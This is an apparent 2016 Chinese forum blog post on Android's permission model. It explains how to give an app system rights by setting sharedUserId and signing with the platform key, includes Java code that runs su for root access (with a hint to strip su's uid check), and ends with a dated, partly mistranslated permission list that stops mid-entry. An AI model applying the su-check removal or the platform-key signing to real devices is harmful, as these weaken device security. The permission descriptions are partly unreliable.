立即注册 登录
逆天PCB论坛 返回首页

yuanxinfei的个人空间 https://bbs.ntpcb.com/?44609 [收藏] [复制] [RSS]

日志

Android系统权限和root权限

已有 711 次阅读2016-7-27 17:01

[color=#333333]

[size=6][b][font=Calibri]Android[/font]权限说明[/b][/size]

[align=left][color=#6d6d6d][url=http://lib.csdn.net/base/15]Android[/url][/color][color=#6d6d6d]系统是运行在[/color][color=#6d6d6d]Linux[/color][color=#6d6d6d]内核上的,[/color][color=#6d6d6d]Android[/color][color=#6d6d6d]与[/color][color=#6d6d6d]Linux[/color][color=#6d6d6d]分别有自己的一套严格的安全及权限机制,[/color][color=#6d6d6d]
Android[/color][color=#6d6d6d]系统权限相关的内容,[/color][/align][align=left][b][color=#6d6d6d](一)[/color][color=#6d6d6d]linux[/color][color=#6d6d6d]文件系统上的权限[/color][/b][color=#6d6d6d]
-rwxr-x--x system   system       4156 2012-06-30 16:12 test.apk.[/color][/align][align=left][color=#6d6d6d]代表的是相应的用户[/color][color=#6d6d6d]/[/color][color=#6d6d6d]用户组及其他人对此文件的访问权限,与此文件运行起来具有的权限完全不相关[/color][b][color=#6d6d6d]
[/color][/b][color=#6d6d6d]比如上面的例子只能说明[/color][color=#6d6d6d]system[/color][color=#6d6d6d]用户拥有对此文件的读写执行权限;[/color][color=#6d6d6d]system[/color][color=#6d6d6d]组的用户对此文件拥有读、执行权限;其他人对此文件只具有执行权限。而[/color][color=#6d6d6d]test.apk[/color][color=#6d6d6d]运行起来后可以干哪些事情,跟这个就不相关了。[/color][color=#6d6d6d]
[/color][color=#6d6d6d]千万不要看[/color][color=#6d6d6d]apk[/color][color=#6d6d6d]文件系统上属于[/color][color=#6d6d6d]system/system[/color][color=#6d6d6d]用户及用户组,或者[/color][color=#6d6d6d]root/root[/color][color=#6d6d6d]用户及用户组,就认为[/color][color=#6d6d6d]apk[/color][color=#6d6d6d]具有[/color][color=#6d6d6d]system[/color][color=#6d6d6d]或[/color][color=#6d6d6d]root[/color][color=#6d6d6d]权限。[/color][color=#6d6d6d]apk[/color][color=#6d6d6d]程序是运行在虚拟机上的[/color][color=#6d6d6d],[/color][color=#6d6d6d]对应的是[/color][color=#6d6d6d]Android[/color][color=#6d6d6d]独特的权限机制,只有体现到文件系统上时才使用[/color][color=#6d6d6d]linux[/color][color=#6d6d6d]的权限设置。[/color][/align][align=left][b][color=#6d6d6d](二)[/color][color=#6d6d6d]Android[/color][color=#6d6d6d]的权限规则[/color][color=#6d6d6d]
[/color][/b][color=#6d6d6d]
[/color][b][color=#6d6d6d]([/color][color=#6d6d6d]1)Android[/color][color=#6d6d6d]中的[/color][color=#6d6d6d]apk[/color][color=#6d6d6d]必须签名[/color][/b][color=#6d6d6d]
[/color][color=#6d6d6d]这种签名不是基于权威证书的,不会决定某个应用允不允许安装,而是一种自签名证书。[/color][color=#6d6d6d]
[/color][color=#6d6d6d]重要的是,[/color][color=#6d6d6d]android[/color][color=#6d6d6d]系统有的权限是基于签名的。比如:[/color][color=#6d6d6d]system[/color][color=#6d6d6d]等级的权限有专门对应的签名,签名不对,权限也就获取不到。[/color][/align][align=left][color=#6d6d6d]默认生成的[/color][color=#6d6d6d]APK[/color][color=#6d6d6d]文件是[/color][color=#6d6d6d]debug[/color][color=#6d6d6d]签名的。获取[/color][color=#6d6d6d]system[/color][color=#6d6d6d]权限时用到的签名见后面描述[/color][/align][align=left][b][color=#6d6d6d]([/color][color=#6d6d6d]2[/color][color=#6d6d6d])基于[/color][color=#6d6d6d]UserID[/color][color=#6d6d6d]的进程级别的安全机制[/color][/b][color=#6d6d6d]
[/color][color=#6d6d6d]进程有独立的地址空间,进程与进程间默认是不能互相访问的,[/color][color=#6d6d6d]Android[/color][color=#6d6d6d]通过为每一个[/color][color=#6d6d6d]apk[/color][color=#6d6d6d]分配唯一的[/color][color=#6d6d6d]linux userID[/color][color=#6d6d6d]来实现,名称为[/color][color=#6d6d6d]"app_"[/color][color=#6d6d6d]加一个数字,比如[/color][color=#6d6d6d]app_43[/color][color=#6d6d6d]不同的[/color][color=#6d6d6d]UserID[/color][color=#6d6d6d],运行在不同的进程,所以[/color][color=#6d6d6d]apk[/color][color=#6d6d6d]之间默认便不能相互访问。[/color][/align][align=left][color=#6d6d6d]Android[/color][color=#6d6d6d]提供了如下的一种机制,可以使两个[/color][color=#6d6d6d]apk[/color][color=#6d6d6d]打破前面讲的这种壁垒。[/color][color=#6d6d6d]
[/color][color=#595959]在AndroidManifest.xml[/color]中利用sharedUserId属性给不同的package分配相同的userID[color=#6d6d6d],通过这样做,两个[/color][color=#6d6d6d]package[/color][color=#6d6d6d]可以被当做同一个程序,[/color][color=#6d6d6d]
[/color][color=#6d6d6d]系统会分配给两个程序相同的[/color][color=#6d6d6d]UserID[/color][color=#6d6d6d]。当然,基于安全考虑,两个[/color][color=#6d6d6d]apk[/color][color=#6d6d6d]需要相同的签名,否则没有验证也就没有意义了。[/color][/align][align=left][b][color=#6d6d6d]([/color][color=#6d6d6d]3[/color][color=#6d6d6d])默认[/color][color=#6d6d6d]apk[/color][color=#6d6d6d]生成的数据对外是不可见的[/color][/b][color=#6d6d6d]
[/color][color=#6d6d6d]实现方法是[/color][color=#7f7f7f]:[/color][size=3][color=#7f7f7f][font=Calibri]Android[/font][/color][color=#7f7f7f]会为程序存储的数据分配该程序的[/color][color=#7f7f7f][font=Calibri]UserID[/font][/color][color=#7f7f7f]。[/color][/size][backcolor=#ffff80][color=#6d6d6d]
[/color][/backcolor][color=#6d6d6d]借助于[/color][color=#6d6d6d]Linux[/color][color=#6d6d6d]严格的文件系统访问权限,便实现了[/color][color=#6d6d6d]apk[/color][color=#6d6d6d]之间不能相互访问似有数据的机制。[/color][color=#6d6d6d]
[/color][color=#6d6d6d]例:我的应用创建的一个文件,默认权限如下,可以看到只有[/color][color=#6d6d6d]UserID[/color][color=#6d6d6d]为[/color][color=#6d6d6d]app_21[/color][color=#6d6d6d]的程序才能读写该文件。[/color][color=#6d6d6d]
-rw------- app_21   app_21      87650 2000-01-01 09:48 test.txt[/color][/align][align=left][color=#6d6d6d]如何对外开放?[/color][color=#6d6d6d]
<1> [/color][color=#6d6d6d]使用[/color][color=#6d6d6d]MODE_WORLD_READABLE and/or MODE_WORLD_WRITEABLE[/color][color=#6d6d6d]标记。[/color][color=#6d6d6d]
When creating a new file with getSharedPreferences(String, int), openFileOutput(String, int), or openOrCreateDatabase(String, int, SQLiteDatabase.CursorFactory), you can use the MODE_WORLD_READABLE and/or MODE_WORLD_WRITEABLE flags to allow any other package to read/write the file. When setting these flags, the file is still owned by your application, but its global read and/or write permissions have been set appropriately so any other application can see it.[/color][/align][align=left][color=#6d6d6d]
[/color][b][color=#6d6d6d]([/color][color=#6d6d6d]4[/color][color=#6d6d6d])[/color][color=#6d6d6d]AndroidManifest.xml[/color][color=#6d6d6d]中的显式权限声明[/color][/b][color=#6d6d6d]
Android[/color][color=#6d6d6d]默认应用是没有任何权限去操作其他应用或系统相关特性的,应用在进行某些操作时都需要显式地去申请相应的权限。[/color][color=#6d6d6d]
[/color][color=#6d6d6d]一般以下动作时都需要申请相应的权限:[/color][/align][align=left][color=#6d6d6d]A particular permission may be enforced at a number of places during your program's operation:[/color][/align][align=left][color=#9a9a9a]At the time of a call into the system, to prevent an application from executing certain functions.When starting an activity, to prevent applications from launching activities of other applications.Both sending and receiving broadcasts, to control who can receive your broadcast or who can send a broadcast to you.When accessing and operating on a content provider.Binding or starting a service.[/color][/align][align=left][color=#6d6d6d]
[/color][size=3][color=#7f7f7f]在应用安装的时候,[/color][color=#7f7f7f][font=Calibri]package installer[/font][/color][color=#7f7f7f]会检测该应用请求的权限,根据该应用的签名或者提示用户来分配相应的权限。[/color][/size][color=#7f7f7f]
[/color][color=#7f7f7f][size=3]在程序运行期间是不检测权限的。如[/size][/color][color=#6d6d6d]果安装时权限获取失败,那执行就会出错,不会提示用户权限不够。[/color][color=#6d6d6d]
[/color][color=#6d6d6d]大多数情况下,权限不足导致的失败会引发一个[/color][color=#6d6d6d] SecurityException[/color][color=#6d6d6d],[/color][color=#6d6d6d]会在系统[/color][color=#6d6d6d]log[/color][color=#6d6d6d]([/color][color=#6d6d6d]system log[/color][color=#6d6d6d])中有相关记录。[/color][/align][align=left][b][color=#6d6d6d]([/color][color=#6d6d6d]5[/color][color=#6d6d6d])权限继承[/color][color=#6d6d6d]/UserID[/color][color=#6d6d6d]继承[/color][/b][color=#6d6d6d]
[/color][color=#6d6d6d]当我们遇到[/color][color=#6d6d6d]apk[/color][color=#6d6d6d]权限不足时,我们有时会考虑写一个[/color][color=#6d6d6d]linux[/color][color=#6d6d6d]程序,然后由[/color][color=#6d6d6d]apk[/color][color=#6d6d6d]调用它去完成某个它没有权限完成的事情,很遗憾,这种方法是行不通的。[/color][color=#6d6d6d]
[/color][color=#6d6d6d]前面讲过,[/color][size=3][color=#7f7f7f][font=Calibri]android[/font][/color][color=#7f7f7f]权限是在进程层面的,也就是说一个[/color][color=#7f7f7f][font=Calibri]apk[/font][/color][color=#7f7f7f]应用启动的子进程的权限不可能超越其父进程的权限(即[/color][color=#7f7f7f][font=Calibri]apk[/font][/color][color=#7f7f7f]的权限),[/color][/size][color=#7f7f7f]
[/color][color=#6d6d6d]即使单独运行某个应用有权限做某事,但如果它是由一个[/color][color=#6d6d6d]apk[/color][color=#6d6d6d]调用的,那权限就会被限制。[/color][color=#6d6d6d]
[/color][color=#6d6d6d]实际上,[/color][color=#6d6d6d]android[/color][color=#6d6d6d]是通过给子进程分配父进程的[/color][color=#6d6d6d]UserID[/color][color=#6d6d6d]实现这一机制的。[/color][/align][align=left][b][color=#6d6d6d](三)常见权限不足问题分析[/color][color=#6d6d6d]
[/color][/b][color=#6d6d6d]
[/color][color=#6d6d6d]首先要知道,普通[/color][color=#6d6d6d]apk[/color][color=#6d6d6d]程序是运行在非[/color][color=#6d6d6d]root[/color][color=#6d6d6d]、非[/color][color=#6d6d6d]system[/color][color=#6d6d6d]层级的,也就是说看要访问的文件的权限时,看的是最后三位。[/color][color=#6d6d6d]
[/color][color=#6d6d6d]另外,通过[/color][color=#6d6d6d]system/app[/color][color=#6d6d6d]安装的[/color][color=#6d6d6d]apk[/color][color=#6d6d6d]的权限一般比直接安装或[/color][color=#6d6d6d]adb install[/color][color=#6d6d6d]安装的[/color][color=#6d6d6d]apk[/color][color=#6d6d6d]的权限要高一些。[/color][color=#6d6d6d]

[/color][color=#6d6d6d]言归正传,运行一个[/color][color=#6d6d6d]android[/color][color=#6d6d6d]应用程序过程中遇到权限不足,一般分为两种情况[/color][color=#6d6d6d]:
[/color][color=#6d6d6d]([/color][color=#6d6d6d]1[/color][color=#6d6d6d])[/color][color=#6d6d6d]Log[/color][color=#6d6d6d]中可明显看到权限不足的提示。[/color][color=#6d6d6d]
[/color][color=#6d6d6d]此种情况一般是[/color][color=#6d6d6d]AndroidManifest.xml[/color][color=#6d6d6d]中缺少相应的权限设置,好好查找一番权限列表,应该就可解决,是最易处理的情况。[/color][/align][align=left][color=#6d6d6d]有时权限都加上了,但还是报权限不足,是什么情况呢?[/color][color=#6d6d6d]
[/color][size=3][color=#7f7f7f][font=Calibri]Android[/font][/color][color=#7f7f7f]系统有一些[/color][color=#7f7f7f][font=Calibri]API[/font][/color][color=#7f7f7f]及权限是需要[/color][color=#7f7f7f][font=Calibri]apk[/font][/color][color=#7f7f7f]具有一定的等级才能运行的。[/color][/size][color=#6d6d6d]
[/color][color=#6d6d6d]比如[/color][color=#6d6d6d] SystemClock.setCurrentTimeMillis()[/color][color=#6d6d6d]修改系统时间,[/color][color=#6d6d6d]WRITE_SECURE_SETTINGS[/color][color=#6d6d6d]权限[/color][color=#6d6d6d]好像都是需要有[/color][color=#6d6d6d]system[/color][color=#6d6d6d]级的权限才行。[/color][color=#6d6d6d]
[/color][color=#6d6d6d]也就是说[/color][color=#6d6d6d]UserID[/color][color=#6d6d6d]是[/color][color=#6d6d6d]system.[/color][/align][align=left][color=#6d6d6d]([/color][color=#6d6d6d]2[/color][color=#6d6d6d])[/color][color=#6d6d6d]Log[/color][color=#6d6d6d]里没有报权限不足,而是一些其他[/color][color=#6d6d6d]Exception[/color][color=#6d6d6d]的提示[/color][color=#6d6d6d],[/color][color=#6d6d6d]这也有可能是权限不足造成的。[/color][color=#6d6d6d]
[/color][color=#6d6d6d]比如:我们常会想读[/color][color=#6d6d6d]/[/color][color=#6d6d6d]写一个配置文件或其他一些不是自己创建的文件,常会报[/color][color=#6d6d6d][url=http://lib.csdn.net/base/17]Java[/url].io.FileNotFoundException[/color][color=#6d6d6d]错误。[/color][color=#6d6d6d]
[/color][color=#6d6d6d]系统认为比较重要的文件一般权限设置的也会比较严格,特别是一些很重要的[/color][color=#6d6d6d]([/color][color=#6d6d6d]配置[/color][color=#6d6d6d])[/color][color=#6d6d6d]文件或目录。[/color][color=#6d6d6d]
[/color][color=#6d6d6d]如[/color][color=#6d6d6d]
-r--r----- bluetooth bluetooth      935 2010-07-09 20:21 dbus.conf
drwxrwx--x system   system            2010-07-07 02:05 data

dbus.conf[/color][color=#6d6d6d]好像是蓝牙的配置文件,从权限上来看,根本就不可能改动,非[/color][color=#6d6d6d]bluetooth[/color][color=#6d6d6d]用户连读的权利都没有。[/color][/align][align=left][color=#6d6d6d]/data[/color][color=#6d6d6d]目录下存的是所有程序的私有数据,默认情况下[/color][color=#6d6d6d]android[/color][color=#6d6d6d]是不允许普通[/color][color=#6d6d6d]apk[/color][color=#6d6d6d]访问[/color][color=#6d6d6d]/data[/color][color=#6d6d6d]目录下内容的,通过[/color][color=#6d6d6d]data[/color][color=#6d6d6d]目录的权限设置可知,其他用户没有读的权限。[/color][color=#6d6d6d]
[/color][color=#6d6d6d]所以[/color][color=#6d6d6d]adb[/color][color=#6d6d6d]普通权限下在[/color][color=#6d6d6d]data[/color][color=#6d6d6d]目录下敲[/color][color=#6d6d6d]ls[/color][color=#6d6d6d]命令,会得到[/color][color=#6d6d6d]opendir failed, Permission denied[/color][color=#6d6d6d]的错误,通过代码[/color][color=#6d6d6d]file.listfiles()[/color][color=#6d6d6d]也无法获得[/color][color=#6d6d6d]data[/color][color=#6d6d6d]目录下的内容。[/color][/align]
[color=#9a9a9a]
[/color][color=#9a9a9a]上面两种情况,一般都需要提升[/color][color=#9a9a9a]apk[/color][color=#9a9a9a]的权限,目前我所知的[/color][color=#9a9a9a]apk[/color][color=#9a9a9a]能提升到的权限就是[/color][color=#9a9a9a]system[/color][color=#9a9a9a](具体方法见:如何使[/color][color=#9a9a9a]Android[/color][color=#9a9a9a]应用程序获取系统权限)[/color][color=#9a9a9a],

[/color]

[size=6][b]怎样使[font=Calibri]android apk [/font]获取[font=Calibri]system[/font]权限[font=Calibri][/font][/b][/size]

[align=left][size=3]最近在回答客户的问题时,提到怎么将apk 升级到root权限。[/size][/align][align=left][size=3] [/size][/align][align=left][size=3]1.一般权限的添加[/size][/align][align=left][size=3]一般情况下,设定apk的权限,可在AndroidManifest.xml中添加android:sharedUserId="android.uid.xxx>[/size][/align][align=left][size=3]例如: 给apk添加system权限[/size][/align][align=left][size=3]<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    ... ...
  [color=red]android:sharedUserId="android.uid.system">[/color][/size][/align][align=left][size=3] [/size][/align][align=left][size=3]同时还需要在对应的Android.mk中添加LOCAL_CERTIFICATE := platform这一项。即用系统的签名,通过这种方式只能使apk的权限升级到system级别,系统中要求root权限才能访问的文件,apk还是不能访问。[/size][/align][align=left][size=3]比如在android 的API中有提供 SystemClock.setCurrentTimeMillis()函数来修改系统时间,这个函数需要root权限或者运行与系统进程中才可以用。[/size][/align]

        第一个方法简单点,不过需要在Android系统源码的环境下用make来编译:
        1. 在应用程序的AndroidManifest.xml中的manifest节点中加入android:sharedUserId="android.uid.system"这个属性。
        2. 修改Android.mk文件,加入LOCAL_CERTIFICATE := platform这一行
        3. 使用mm命令来编译,生成的apk就有修改系统时间的权限了。

        第二个方法是直接把eclipse编出来的apk用系统的签名文件签名
        1. 加入android:sharedUserId="android.uid.system"这个属性。
        2. 使用eclipse编译出apk文件。
        3. 使用目标系统的platform密钥来重新给apk文件签名。首先找到密钥文件,在我ndroid源码目录中的位置是"build/target/product/security",下面的platform.pk8和platform.x509.pem两个文件。然后用Android提供的Signapk工具来签名,signapk的源代码是在"build/tools/signapk"下,编译后在out/host/linux-x86/framework下,用法为java -jar signapk.jar  platform.x509.pem platform.pk8 input.apk output.apk"。
       加入android:sharedUserId="android.uid.system"这个属性。通过Shared User id,拥有同一个User id的多个APK可以配置成运行在同一个进程中。那么把程序的UID配成android.uid.system,也就是要让程序运行在系统进程中,这样就有权限来修改系统时间了。
        只是加入UID还不够,如果这时候安装APK的话发现无法安装,提示签名不符,原因是程序想要运行在系统进程中还要有目标系统的platform key,就是上面第二个方法提到的platform.pk8和platform.x509.pem两个文件。用这两个key签名后apk才真正可以放入系统进程中。第一个方法中加入LOCAL_CERTIFICATE := platform其实就是用这两个key来签名。
        这也有一个问题,就是这样生成的程序只有在原始的Android系统或者是自己编译的系统中才可以用,因为这样的系统才可以拿到platform.pk8和platform.x509.pem两个文件。要是别家公司做的Android上连安装都安装不了。试试原始的Android中的key来签名,程序在模拟器上运行OK,不过放到G3上安装直接提示"Package ... has no signatures that match those in shared user android.uid.system",这样也是保护了系统的安全。


[size=6][b]怎样使[font=Calibri]android apk [/font]获取[font=Calibri]root[/font]权限[/b][/size]

[align=left][size=3] [/size][/align][align=left][size=3]一般linux 获取root权限是通过执行su命令,那能不能在apk程序中也同样执行一下该命令呢,我们知道在linux编程中,有exec函数族:[/size][/align][align=left][size=3]  int execl(c[url=http://www.dzsc.com/data/iccompany/detail12.html][color=#ff9900]ON[/color][/url]st char *path, const char *arg, ...);[/size][/align][align=left][size=3]  int execlp(const char *file, const char *arg, ...);[/size][/align][align=left][size=3]  int execle(const char *path, const char *arg, ..., char *const envp[]);[/size][/align][align=left][size=3]  int execv(const char *path, char *const argv[]);[/size][/align][align=left][size=3]  int execvp(const char *file, char *const argv[]);[/size][/align][align=left][size=3]  int execve(const char *path, char *const argv[], char *const envp[]);[/size][/align][align=left][size=3] [/size][/align][align=left][size=3]在java中我们可以借助 Runtime.getRuntime().exec([url=http://www.coderanch.com/t/410859/java/java/String-StringBuffer-StringBuilder-Performance][color=#ff9900]String[/color][/url] command)访问底层Linux下的程序或脚本,这样就能执行su命令,使apk具有root权限,能够访问系统中需要root权限才能执行的程序或脚本了,具体例子:[/size][/align][align=left][size=3] [/size][/align][align=left][size=3]package com.visit.dialoglog;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import android.app.Activity;
import android.os.Bundle;
import android.util.Log;
public class VisitRootfileActivity extends Activity {
    private static final String TAG = "VisitRootfileActivity";
    Process process = null;
    Process process1 = null;  
    DataOutputStream os = null;
    DataInputStream is = null;
    /** Called when the activity is first created. */
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        try {
            process = Runtime.getRuntime().exec("/system/xbin/su"); /*这里可能需要修改su[/size][/align][align=left][size=3]   的源代码 (注掉  if (myuid != AID_ROOT && myuid != AID_SHELL) {*/[/size][/align][align=left][size=3]            os = new DataOutputStream(process.getOutputStream());
            is = new DataInputStream(process.getInputStream());
           os.writeBytes("/system/bin/ls" + " \n");  //这里可以执行具有root 权限的程序了[/size][size=3]  
            os.writeBytes(" exit \n");
            os.flush();
            process.waitFor();
        } catch (Exception e) {            
            Log.e(TAG, "Unexpected error - Here is what I know:" + e.getMessage());
        } finally {
            try {
                if (os != null) {
                    os.close();
                }
                if (is != null) {
                    is.close();
                }
                process.destroy();
            } catch (Exception e) {
            }
        }// get the root privileges
    }
}[/size][/align][align=left][size=3] [/size][/align][align=left][size=3] [/size][/align][align=left][size=3] [/size][/align]

[size=6][b]APK在AndroidManifest.xml常用权限[/b][/size]


[size=3][font=Calibri]android.permission.ACCESS_CHECKIN_PROPERTIES
//[/font][/size]允许读写访问[font=Calibri]”properties”[/font]表在[font=Calibri]checkin[/font][url=http://lib.csdn.net/base/14]数据库[/url]中,改值可以修改上传[size=3][font=Calibri]
android.permission.ACCESS_COARSE_LOCATION
//[/font][/size]允许一个程序访问[font=Calibri]CellID[/font]或[font=Calibri]WiFi[/font]热点来获取粗略的位置[size=3][font=Calibri]
android.permission.ACCESS_FINE_LOCATION
//[/font][/size]允许一个程序访问精良位置[font=Calibri]([/font]如[size=3][font=Calibri]GPS)
android.permission.ACCESS_LOCATION_EXTRA_COMMANDS
//[/font][/size]允许应用程序访问额外的位置提供命令[size=3][font=Calibri]
android.permission.ACCESS_MOCK_LOCATION
//[/font][/size]允许程序创建模拟位置提供用于测试[size=3][font=Calibri]
android.permission.ACCESS_NETWORK_STATE
//[/font][/size]允许程序访问有关[font=Calibri]GSM[/font]网络信息[size=3][font=Calibri]
android.permission.ACCESS_SURFACE_FLINGER
//[/font][/size]允许程序使用[font=Calibri]SurfaceFlinger[/font]底层特性[size=3][font=Calibri]
android.permission.ACCESS_WIFI_STATE
//[/font][/size]允许程序访问[font=Calibri]Wi-Fi[/font]网络状态信息[size=3][font=Calibri]
android.permission.ADD_SYSTEM_SERVICE
//[/font][/size]允许程序发布系统级服务[size=3][font=Calibri]
android.permission.BATTERY_STATS
//[/font][/size]允许程序更新手机电池统计信息[size=3][font=Calibri]
android.permission.BLUETOOTH
//[/font][/size]允许程序连接到已配对的蓝牙设备[size=3][font=Calibri]
android.permission.BLUETOOTH_ADMIN
//[/font][/size]允许程序发现和配对蓝牙设备[size=3][font=Calibri]
android.permission.BRICK
//[/font][/size]请求能够禁用设备[font=Calibri]([/font]非常危险[size=3][font=Calibri]
android.permission.BROADCAST_PACKAGE_REMOVED
//[/font][/size]允许程序广播一个提示消息在一个应用程序包已经移除后[size=3][font=Calibri]
android.permission.BROADCAST_STICKY
//[/font][/size]允许一个程序广播常用[size=3][font=Calibri]intents
android.permission.CALL_PHONE
//[/font][/size]允许一个程序初始化一个电话拨号不需通过拨号用户界面需要用户确认[size=3][font=Calibri]
android.permission.CALL_PRIVILEGED
//[/font][/size]允许一个程序拨打任何号码,包含紧急号码无需通过拨号用户界面需要用户确认[size=3][font=Calibri]
android.permission.CAMERA
//[/font][/size]请求访问使用照相设备[size=3][font=Calibri]
android.permission.CHANGE_COMPONENT_ENABLED_STATE
//[/font][/size]允许一个程序是否改变一个组件或其他的启用或禁用[size=3][font=Calibri]
android.permission.CHANGE_CONFIGURATION
//[/font][/size]允许一个程序修改当前设置,如本地化[size=3][font=Calibri]

[/font][/size]
[size=3][font=Calibri]android.permission.CHANGE_NETWORK_STATE
//[/font][/size]允许程序改变网络连接状态[size=3][font=Calibri]
android.permission.CHANGE_WIFI_STATE
//[/font][/size]允许程序改变[font=Calibri]Wi-Fi[/font]连接状态[size=3][font=Calibri]
android.permission.CLEAR_APP_CACHE
//[/font][/size]允许一个程序清楚缓存从所有安装的程序在设备中[size=3][font=Calibri]
android.permission.CLEAR_APP_USER_DATA
//[/font][/size]允许一个程序清除用户设置[size=3][font=Calibri]
android.permission.CONTROL_LOCATION_UPDATES
//[/font][/size]允许启用禁止位置更新提示从无线模块[size=3][font=Calibri]
android.permission.DELETE_CACHE_FILES
//[/font][/size]允许程序删除缓存文件[size=3][font=Calibri]
android.permission.DELETE_PACKAGES
//[/font][/size]允许一个程序删除包[size=3][font=Calibri]
android.permission.DEVICE_POWER
//[/font][/size]允许访问底层电源管理[size=3][font=Calibri]
android.permission.DIAGNOSTIC
//[/font][/size]允许程序[font=Calibri]RW[/font]诊断资源[size=3][font=Calibri]
android.permission.DISABLE_KEYGUARD
//[/font][/size]允许程序禁用键盘锁[size=3][font=Calibri]
android.permission.DUMP
//[/font][/size]允许程序返回状态抓取信息从系统服务[size=3][font=Calibri]
android.permission.EXPAND_STATUS_BAR
//[/font][/size]允许一个程序扩展收缩在状态栏[font=Calibri],android[/font]开发网提示应该是一个类似[font=Calibri]Windows Mobile[/font]中的托盘程序[size=3][font=Calibri]
android.permission.FACTORY_TEST
//[/font][/size]作为一个工厂测试程序,运行在[font=Calibri]root[/font]用户[size=3][font=Calibri]
android.permission.FLASHLIGHT
//[/font][/size]访问闪光灯[font=Calibri],android[/font]开发网提示[font=Calibri]HTC Dream[/font]不包含闪光灯[size=3][font=Calibri]
android.permission.FORCE_BACK
//[/font][/size]允许程序强行一个后退操作是否在顶层[size=3][font=Calibri]activities
android.permission.FOTA_UPDATE
//[/font][/size]暂时不了解这是做什么使用的,[font=Calibri]android[/font]开发网分析可能是一个预留权限[size=3][font=Calibri].
android.permission.GET_ACCOUNTS
//[/font][/size]访问一个帐户列表在[font=Calibri]Accounts Service[/font]中[size=3][font=Calibri]
android.permission.GET_PACKAGE_SIZE
//[/font][/size]允许一个程序获取任何[font=Calibri]package[/font]占用空间容量[size=3][font=Calibri]
android.permission.GET_TASKS
//[/font][/size]允许一个程序获取信息有关当前或最近运行的任务,一个缩略的任务状态,是否活动等等[size=3][font=Calibri]
android.permission.HARDWARE_TEST
//[/font][/size]允许访问硬件[size=3][font=Calibri]
android.permission.INJECT_EVENTS
//[/font][/size]允许一个程序截获用户事件如按键、触摸、轨迹球等等到一个时间流,[font=Calibri]android[/font]开发网提醒算是[font=Calibri]hook[/font]技术吧[size=3][font=Calibri]
android.permission.INSTALL_PACKAGES
//[/font][/size]允许一个程序安装[size=3][font=Calibri]packages
android.permission.INTERNAL_SYSTEM_WINDOW
//[/font][/size]允许打开窗口使用系统用户界面[size=3][font=Calibri]
android.permission.INTERNET
//[/font][/size]允许程序打开网络套接字[size=3][font=Calibri]
android.permission.MANAGE_APP_TOKENS
//[/font][/size]允许程序管理[font=Calibri]([/font]创建、催后、[font=Calibri] z- order[/font]默认向[font=Calibri]z[/font]轴推移[font=Calibri])[/font]程序引用在窗口管理器中[size=3][font=Calibri]
android.permission.MASTER_CLEAR
//[/font][/size]目前还没有明确的解释,[font=Calibri]android[/font]开发网分析可能是清除一切数据,类似硬格机[size=3][font=Calibri]
android.permission.MODIFY_AUDIO_SETTINGS
//[/font][/size]允许程序修改全局音频设置[size=3][font=Calibri]
android.permission.MODIFY_PHONE_STATE
//[/font][/size]允许修改话机状态,如电源,人机接口等[size=3][font=Calibri]
android.permission.MOUNT_UNMOUNT_FILESYSTEMS
//[/font][/size]允许挂载和反挂载文件系统可移动存储[size=3][font=Calibri]
android.permission.PERSISTENT_ACTIVITY
//[/font][/size]允许一个程序设置他的[font=Calibri]activities[/font]显示[size=3][font=Calibri]
android.permission.PROCESS_OUTGOING_CALLS
//[/font][/size]允许程序监视、修改有关播出电话[size=3][font=Calibri]
android.permission.READ_CALENDAR
//[/font][/size]允许程序读取用户日历数据[size=3][font=Calibri]
android.permission.READ_CONTACTS
//[/font][/size]允许程序读取用户联系人数据[size=3][font=Calibri]
android.permission.READ_FRAME_BUFFER
//[/font][/size]允许程序屏幕波或和更多常规的访问帧缓冲数据[size=3][font=Calibri]
android.permission.READ_INPUT_STATE
//[/font][/size]允许程序返回当前按键状态[size=3][font=Calibri]
android.permission.READ_LOGS
//[/font][/size]允许程序读取底层系统日志文件[size=3][font=Calibri]
android.permission.READ_OWNER_DATA
//[/font][/size]允许程序读取所有者数据[size=3][font=Calibri]
android.permission.READ_SMS
//[/font][/size]允许程序读取短信息[size=3][font=Calibri]
android.permission.READ_SYNC_SETTINGS
//[/font][/size]允许程序读取同步设置[size=3][font=Calibri]
android.permission.READ_SYNC_STATS
//[/font][/size]允许程序读取同步状态[size=3][font=Calibri]
android.permission.REBOOT
//[/font][/size]请求能够重新启动设备[size=3][font=Calibri]
android.permission.RECEIVE_BOOT_COMPLETED
//[/font][/size]允许一个程序接收到[size=3][font=Calibri]
android.permission.RECEIVE_MMS
//[/font][/size]允许一个程序监控将收到[font=Calibri]MMS[/font]彩信[font=Calibri],[/font]记录或处理[size=3][font=Calibri]
android.permission.RECEIVE_SMS
//[/font][/size]允许程序监控一个将收到短信息,记录或处理[size=3][font=Calibri]
android.permission.RECEIVE_WAP_PUSH
//[/font][/size]允许程序监控将收到[font=Calibri]WAP PUSH[/font]信息[size=3][font=Calibri]
android.permission.RECORD_AUDIO
//[/font][/size]允许程序录制音频[size=3][font=Calibri]
android.permission.REORDER_TASKS
//[/font][/size]允许程序改变[font=Calibri]Z[/font]轴排列任务[size=3][font=Calibri]
android.permission.RESTART_PACKAGES
//[/font][/size]允许程序重新启动其他程序[size=3][font=Calibri]
android.permission.SEND_SMS
//[/font][/size]允许程序发送[font=Calibri]SMS[/font]短信[size=3][font=Calibri]
android.permission.SET_ACTIVITY_WATCHER
//[/font][/size]允许程序监控或控制[font=Calibri]activities[/font]已经启动全局系统中[size=3][font=Calibri]
android.permission.SET_ALWAYS_FINISH
//[/font][/size]允许程序控制是否活动间接完成在处于后台时[size=3][font=Calibri]
android.permission.SET_ANIMATION_SCALE
//[/font][/size]修改全局信息比例[size=3][font=Calibri]
android.permission.SET_DEBUG_APP
//[/font][/size]配置一个程序用于调试[size=3][font=Calibri]
android.permission.SET_ORIENTATION
//[/font][/size]允许底层访问设置屏幕方向和实际旋转[size=3][font=Calibri]
android.permission.SET_PREFERRED_APPLICATIONS
//[/font][/size]允许一个程序修改列表参数[font=Calibri]PackageManager.addPackageToPreferred()[/font]和[font=Calibri]PackageManager.removePackageFromPreferred()[/font]方法[size=3][font=Calibri]
android.permission.SET_PROCESS_FOREGROUND
//[/font][/size]允许程序当前运行程序强行到前台[size=3][font=Calibri]
android.permission.SET_PROCESS_LIMIT
//[/font][/size]允许设置最大的运行进程数量[size=3][font=Calibri]
android.permission.SET_TIME_ZONE
